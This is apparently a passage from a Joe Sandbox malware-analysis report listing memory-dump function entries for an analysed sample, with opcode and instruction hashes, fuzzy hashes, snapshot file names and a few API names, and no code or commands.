                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 686dae65ad203321fff4286047bcdf564e1cde2190e825a17d50878d44262c00
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B4102729143548BD329CB29C8613E7B3A2FFDA311F09856DC9CA8B399EB3858418391
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: da577a0a5d9dd1218a37203d54b1921698a7272595eaf6be71f58efab4809eba
                                                                                                                                                                                                                                              • Instruction ID: 67f8aae275306a347e5827db6d301b6ba8e57761617a3b3087d302a472e326d9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da577a0a5d9dd1218a37203d54b1921698a7272595eaf6be71f58efab4809eba
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C618FB2608B818FD315AF39D49229BBFE19F99304F08C87DD4DE87742D634A509CB56
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 0292b0a97f27e26d4e5ad670a45b6074c2ec285fa932f8b733ea163fa43ec7b7
                                                                                                                                                                                                                                              • Instruction ID: 64589ad42b6f13230785113a18663ce0d43325b0c3f48c6433725dd65be8ef29
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0292b0a97f27e26d4e5ad670a45b6074c2ec285fa932f8b733ea163fa43ec7b7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF4120B6A193406BE304DF22FC5265B7AA3EBD5309F18C43DE84447317E539C6098B49
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 0d00e0fc4da09a6ae6cddbd763618d0d6aaee8a47fc11dcfe2916fa315513b37
                                                                                                                                                                                                                                              • Instruction ID: d1fb7509076af1ffb50b7779203579908b40d0ff30a95e45ae09fd1c6e327928
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d00e0fc4da09a6ae6cddbd763618d0d6aaee8a47fc11dcfe2916fa315513b37
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A811043BB2962107E350DE26DCD861B7752EBD631070A0076EE41E73E2CAB5F841D1A4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 86eafbf284ae91bd7090555c26a2661bfabd90b69a551cbdb49ac481f3dcd4b6
                                                                                                                                                                                                                                              • Instruction ID: 8c1538aadde9067d7f50c33328b7dd90109b5701599d711617560ca2cb3267e3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86eafbf284ae91bd7090555c26a2661bfabd90b69a551cbdb49ac481f3dcd4b6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46210B7AA152018BD724DB25CC41A7BF397EBC4304F19DA7DD8C2A7298DB34AC158786
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                              • Instruction ID: 4880154dcf8b0d0f21340028b50a9d6186b0c3c31601bb0eff288ffcf82f82b1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E112933A045D40EC3128D3C8400566BFE30ADB334F5D53DAF4B89B3D2D6268D8A8B59
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 0195ff22bc3b67a48e0e57b27cdd428415b416d7eb2fd4c47018d448268a19ee
                                                                                                                                                                                                                                              • Instruction ID: 323fc6218cea3305572900b5d46b7e086bf09e9d91523618513d5d3fdfb84df2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0195ff22bc3b67a48e0e57b27cdd428415b416d7eb2fd4c47018d448268a19ee
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 741177343093209B9A198F24716063FBBA2AB97B14FA5652ED98217750C224ED16CBDF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: cd4b45de63c3dd4b4d54165f33b09b04a9dc2e1438e93676a650e7e2c70131f4
                                                                                                                                                                                                                                              • Instruction ID: 5e13abacc2ad6a51e6be12efd643edf794c78630c18e36d079d3e7dd80fead49
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd4b45de63c3dd4b4d54165f33b09b04a9dc2e1438e93676a650e7e2c70131f4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C01D47860A6918BD7098FB4C49162BBB23BF82300B28D16ED4161FF5ADA34E415C749
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitVariant
                                                                                                                                                                                                                                              • String ID: D$E$G$I$M$P$V$]$^$^
                                                                                                                                                                                                                                              • API String ID: 1927566239-2592861624
                                                                                                                                                                                                                                              • Opcode ID: aa7b5f887987e17e9369c7b62c587c5c4aad096d599b7b8d9a86b60c5cf73a52
                                                                                                                                                                                                                                              • Instruction ID: 4f84bbc71567c9c34e0298bf8bff6b46d288640b3b08763d0babfb3ed61e7620
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa7b5f887987e17e9369c7b62c587c5c4aad096d599b7b8d9a86b60c5cf73a52
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1418961108BC18AD725CF3CC888702BFA16BA6224F1987DCD8E94F3EBC678D505C766
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                              • Opcode ID: 81c340c43b8454b1a6cf376c783d0f63086a51cc65df73aaeab75bca73f9757c
                                                                                                                                                                                                                                              • Instruction ID: cd5cc318eb1e32412ddb51e6d631dad47c2fb6b2673f7cc346886bbfae7eef40
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81c340c43b8454b1a6cf376c783d0f63086a51cc65df73aaeab75bca73f9757c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7831A2B49143509FDB40EF6CD98464DBBF4BF89304F41892DE498DB360D7B4A958CB86